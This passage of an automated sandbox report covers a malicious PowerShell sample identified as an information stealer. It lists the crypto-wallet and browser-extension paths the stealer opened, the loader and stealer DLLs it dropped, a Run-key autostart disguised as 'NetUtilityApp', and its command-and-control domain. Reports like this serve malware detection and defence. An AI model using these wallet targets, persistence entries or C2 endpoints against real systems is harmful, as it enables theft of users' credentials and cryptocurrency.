                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

                    Remote Access Functionality

                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                    MITRE ATT&CK matrix, tactic columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Behavior Graph: ID 1558794; Sample: xaSPJNbl.ps1; Start date: 19/11/2024; Architecture: WINDOWS; Score: 100

                    Source | Detection | Scanner | Label | Link
                    xaSPJNbl.ps1 | 0% | ReversingLabs
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\accpl | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\ktb | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\accpl | 50% | ReversingLabs | Win32.Trojan.MintZard
                    C:\Users\user\AppData\Local\Temp\ktb | 50% | ReversingLabs | Win32.Trojan.MintZard
                    C:\Users\user\AppData\Roaming\DUC\Qt5Core.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\Qt5Network.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\libssl-1_1-x64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\msvcp140.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\msvcp140_1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\steam_api64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\vcruntime140.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\DUC\vcruntime140_1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Core.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\Qt5Network.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\config.prx | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\libcrypto-1_1-x64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\libssl-1_1-x64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\msvcp140_1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\opengl64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\steam_api64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\updater\NvStWiz.prx | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\vcruntime140_1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\Register.dll | 3% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlc.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\libvlccore.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips32.dll | 2% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\CryptoPP530Fips64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC32.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\FlowSshC64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\Microsoft.VisualStudio.VsWebProtocol | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\NvStWiz | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\StartupHelper | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQLiteShell.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\ICQRT.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteRes.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\LiteSkinUtils.dll | 79% | ReversingLabs | Win32.Trojan.HijackLoader
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\WinRar.exe | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll | 65% | ReversingLabs | Win32.Trojan.Malgent
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\unrar.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1049.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\lang-1058.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\rtl120.bpl | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\trading_api64.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\tradingnetworkingsockets.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x64\vcl120.bpl | 47% | ReversingLabs | Win32.Trojan.LummaC
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dll | 0% | ReversingLabs
                    C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dll | 0% | ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://cf.icq.com/cf/icqlite/legal.html | 0% | Avira URL Cloud | safe
                    5ptit5tuded.cyou | 0% | Avira URL Cloud | safe
                    http://web.icq.com/cf/icqmapIYou | 0% | Avira URL Cloud | safe
                    http://www.icq.americangreetings.com/icqorder.pd?mode=send&design=%s&title=%s&recipient=%s&text=%s&s | 0% | Avira URL Cloud | safe
                    https://www.bitvise.com/0 | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/ | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/apiob | 0% | Avira URL Cloud | safe
                    http://time.certum.pl0 | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/spam_auto_filter.html2http://cf.icq.com/cf/icqlite/spam_auto_filter.htm | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/2002/icqswatch.html | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/api: | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/api | 100% | Avira URL Cloud | malware
                    https://ps3.scedev.net/ | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/zodiac.html | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/lost_password.html | 0% | Avira URL Cloud | safe
                    http://www.developershome.com/7-zip/ | 0% | Avira URL Cloud | safe
                    https://www.certum.pl/repository. | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/U | 0% | Avira URL Cloud | safe
                    http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d | 0% | Avira URL Cloud | safe
                    http://www.avast.com0/ | 0% | Avira URL Cloud | safe
                    http://www.teisininkas.lt/ivairus/7-zip: | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/public_private_modes.html | 0% | Avira URL Cloud | safe
                    http://www.icq.com. | 0% | Avira URL Cloud | safe
                    http://www.prizeeinternational.com | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/help.html8Failed | 0% | Avira URL Cloud | safe
                    http://wwp.icq.com/%sGSending | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/firewall_help.html/http://cf.icq.com/cf/icqlite/fail_register.html/http | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/s | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/p | 0% | Avira URL Cloud | safe
                    http://ocsp.certum.pl0 | 0% | Avira URL Cloud | safe
                    https://5ptit5tuded.cyou/apirtyM | 0% | Avira URL Cloud | safe
                    http://wwp.icq.com/%UinStr% | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/download_p.html4Please | 0% | Avira URL Cloud | safe
                    http://electricity.co.ke) | 0% | Avira URL Cloud | safe
                    http://cf.icq.com/cf/icqlite/liteskin.html | 0% | Avira URL Cloud | safe
                    http://wwp.icq.com/%dBThe | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
5ptit5tuded.cyou | 188.114.97.3 | true | true | | unknown
rentry.co | 172.67.75.40 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                          unknown
                                                                                                                          http://c0rl.m%LSetup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44msiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://5ptit5tuded.cyou/apirtyMmsiexec.exe, 0000000A.00000003.2119251555.0000000000765000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2121215580.0000000000766000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://store.steampowered.com/app/Setup.exe, 00000004.00000000.1817611630.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.1970234983.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000002.2040700513.00007FF668A85000.00000002.00000001.01000000.00000009.sdmp, Setup.exe, 00000007.00000000.1904136385.00007FF668A85000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                                                                high
                                                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cf.icq.com/cf/icqlite/download_p.html4Pleasepowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://cf.icq.com/cf/icqlite/liteskin.htmlpowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://crl.mSetup.exe, 00000004.00000002.1937699417.0000029C06880000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2013467032.000002563FFF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypowershell.exe, 00000001.00000002.1820039658.00000198BA3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgmsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000001.00000002.1820039658.00000198B91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?msiexec.exe, 0000000A.00000003.2120077314.0000000005550000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&umsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.openssl.org/HSetup.exe, 00000004.00000002.2003851978.00007FFBA1D8A000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000004.00000002.2041202326.00007FFBA9C29000.00000002.00000001.01000000.00000010.sdmp, Setup.exe, 00000004.00000003.1903329765.0000029C04643000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000003.1994011222.000002563DED9000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000007.00000002.2069435347.00007FFBA1D8A000.00000002.00000001.01000000.0000000E.sdmp, Setup.exe, 00000007.00000002.2084881953.00007FFBA9C29000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctamsiexec.exe, 0000000A.00000003.2121754732.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1820039658.00000198B8FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://electricity.co.ke)powershell.exe, 00000001.00000002.1820039658.00000198B9C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198B9BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://bugreports.qt.io/_q_receiveReplyensureClientPrefaceSentMicrosoft-IIS/4.Microsoft-IIS/5.NetscaSetup.exe, 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp, Setup.exe, 00000007.00000002.2050033866.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://wwp.icq.com/%dBThepowershell.exe, 00000001.00000002.1820039658.00000198BB155000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://www.globalsign.net/repository/03powershell.exe, 00000001.00000002.1820039658.00000198BB26F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1820039658.00000198BB447000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | 5ptit5tuded.cyou | European Union | 13335 | CLOUDFLARENETUS | true
172.67.75.40 | rentry.co | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1558794
Start date and time: 2024-11-19 20:04:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xaSPJNbl.ps1
Detection: MAL
Classification: mal100.troj.spyw.evad.winPS1@19/176@2/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Setup.exe, PID 348 because there are no executed function
• Execution Graph export aborted for target Setup.exe, PID 4260 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: xaSPJNbl.ps1
Time | Type | Description
14:05:48 | API Interceptor | 43x Sleep call for process: powershell.exe modified
14:06:24 | API Interceptor | 8x Sleep call for process: msiexec.exe modified
20:06:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
20:06:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\zcZPHzDH\Setup.exe
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        188.114.97.3PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                        gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                                        Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                        • gmtagency.online/api/check
                                                                                                                                                        View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                        • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                        • paste.ee/d/YU1NN
                                                                                                                                                        TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • www.lnnn.fun/u5w9/
                                                                                                                                                        QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • filetransfer.io/data-package/iiEh1iM3/download
                                                                                                                                                        Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • paste.ee/d/dc8Ru
                                                                                                                                                        172.67.75.40zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • arc-gym.com.cutestat.com/wp-login.php
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        rentry.coExploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        MilwaukeeRivers.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.26.2.16
                                                                                                                                                        RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        SecuriteInfo.com.Python.Stealer.1545.20368.28754.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                        • 104.26.2.16
                                                                                                                                                        grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                                        • 104.26.3.16
                                                                                                                                                        SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeGet hashmaliciousXWormBrowse
                                                                                                                                                        • 104.26.3.16
                                                                                                                                                        nkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                        • 104.26.3.16
Match   Associated Sample Name / URL   SHA 256   Detection   Threat Name   Link   Context
                                                                                                                                                        CLOUDFLARENETUShttp://user.ecomab.ccGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        https://trimmer.to:443/GWHMYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 104.17.25.14
                                                                                                                                                        Your_Bonus_Breakdown_2024.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        Your_Bonus_Breakdown_2024.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.18.95.41
                                                                                                                                                        https://hopp.bio/wchnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Benefit Enrollment -eGz8VNb.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        mainbas.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.16.230.132
                                                                                                                                                        bas.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.16.230.132
Match   Associated Sample Name / URL   SHA 256   Detection   Threat Name   Link   Context
                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        EIR5pTRn9R.exeGet hashmaliciousDragonForceBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        • 172.67.75.40
Match   Associated Sample Name / URL   SHA 256   Detection   Threat Name   Link   Context
                                                                                                                                                        C:\Users\user\AppData\Roaming\DUC\libcrypto-1_1-x64.dll4OVYJHCTFA.exeGet hashmaliciousLummaCBrowse
